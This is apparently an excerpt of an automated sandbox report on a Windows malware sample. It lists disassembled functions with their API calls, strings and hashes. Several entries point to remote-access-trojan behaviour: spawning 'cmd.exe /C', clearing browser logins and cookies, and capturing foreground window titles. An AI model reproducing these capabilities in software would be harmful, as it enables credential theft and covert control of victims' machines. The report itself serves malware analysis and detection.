                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseErrorHandleLast__dosmaperr
                                        • String ID: `@
                                        • API String ID: 2583163307-951712118
                                        • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                        • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                        • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                        • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                        Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                        • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                        • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandleObjectSingleWait
                                        • String ID: Connection Timeout
                                        • API String ID: 2055531096-499159329
                                        • Opcode ID: f305bfd07311d1c13337a4e5318bcab9ce6904fe2946ae268386a72c1b1384b4
                                        • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                        • Opcode Fuzzy Hash: f305bfd07311d1c13337a4e5318bcab9ce6904fe2946ae268386a72c1b1384b4
                                        • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                        Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                          • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                          • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                        • String ID: bad locale name
                                        • API String ID: 3628047217-1405518554
                                        • Opcode ID: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                                        • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                        • Opcode Fuzzy Hash: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                                        • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                        Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID: /C $cmd.exe$open
                                        • API String ID: 587946157-3896048727
                                        • Opcode ID: ee6d09c7a5be61fc2c77f0fe381f15b1933766d643093560b744fac4f5f657b7
                                        • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                        • Opcode Fuzzy Hash: ee6d09c7a5be61fc2c77f0fe381f15b1933766d643093560b744fac4f5f657b7
                                        • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                        Function 00448D1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                        • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                        • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                        • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                        Function 004559DA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                        • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                        • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                        • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                        Function 00441A91 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                        • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                        • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                        • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                        Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                        • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                        • API String ID: 3472027048-1236744412
                                        • Opcode ID: d2a0294277962853990a195d18ad75d93c5fb84cb6733bcbd89099a09a5abd0a
                                        • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                        • Opcode Fuzzy Hash: d2a0294277962853990a195d18ad75d93c5fb84cb6733bcbd89099a09a5abd0a
                                        • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                        Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                        • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQuerySleepValue
                                        • String ID: @CG$exepath$BG
                                        • API String ID: 4119054056-3221201242
                                        • Opcode ID: efcd0af1208699037f09edad500f6ec840cfbf7b9737e1f52f1688804d5b7727
                                        • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                        • Opcode Fuzzy Hash: efcd0af1208699037f09edad500f6ec840cfbf7b9737e1f52f1688804d5b7727
                                        • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                        Function 0041A99A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SystemTimes$Sleep__aulldiv
                                        • String ID:
                                        • API String ID: 188215759-0
                                        • Opcode ID: a7aecd4cc0fde8f7b051f4ea324c4733a42c71902c3a125d4e8e0ff6e46eea08
                                        • Instruction ID: a679ad691b1e431344cd65e278b90b5c6278f623fb05ceb41248f345421e7781
                                        • Opcode Fuzzy Hash: a7aecd4cc0fde8f7b051f4ea324c4733a42c71902c3a125d4e8e0ff6e46eea08
                                        • Instruction Fuzzy Hash: 30215E725093009BC304DFA5D98589FB7E8EFC8754F044A2EF585D3251EA35EA49CBA3
                                        Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                          • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                          • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                        • Sleep.KERNEL32(000001F4), ref: 00409C95
                                        • Sleep.KERNEL32(00000064), ref: 00409D1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$SleepText$ForegroundLength
                                        • String ID: [ $ ]
                                        • API String ID: 3309952895-93608704
                                        • Opcode ID: d9bb369aee4f6e2201f2c860cf6756c16528595133d71e2ae5baff2000eb7cae
                                        • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                        • Opcode Fuzzy Hash: d9bb369aee4f6e2201f2c860cf6756c16528595133d71e2ae5baff2000eb7cae
                                        • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                        Function 00442CE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                        • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                        • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                        • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                        Function 00442D61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                        • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                        • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                        • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                        Function 00438105 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                          • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                          • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                        • _UnwindNestedFrames.LIBCMT ref: 00438134
                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                        • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                        • String ID:
                                        • API String ID: 737400349-0
                                        • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                        • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                        • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                        • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                        Function 00447220 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471C7,00000000,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                        • GetLastError.KERNEL32(?,004471C7,00000000,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,00000000,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                        • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                        • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                        • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                        Function 0041B62A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                                        • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 3919263394-0
                                        • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                        • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                        • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                        • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                        Function 0041851C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                        • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                        • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                        • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
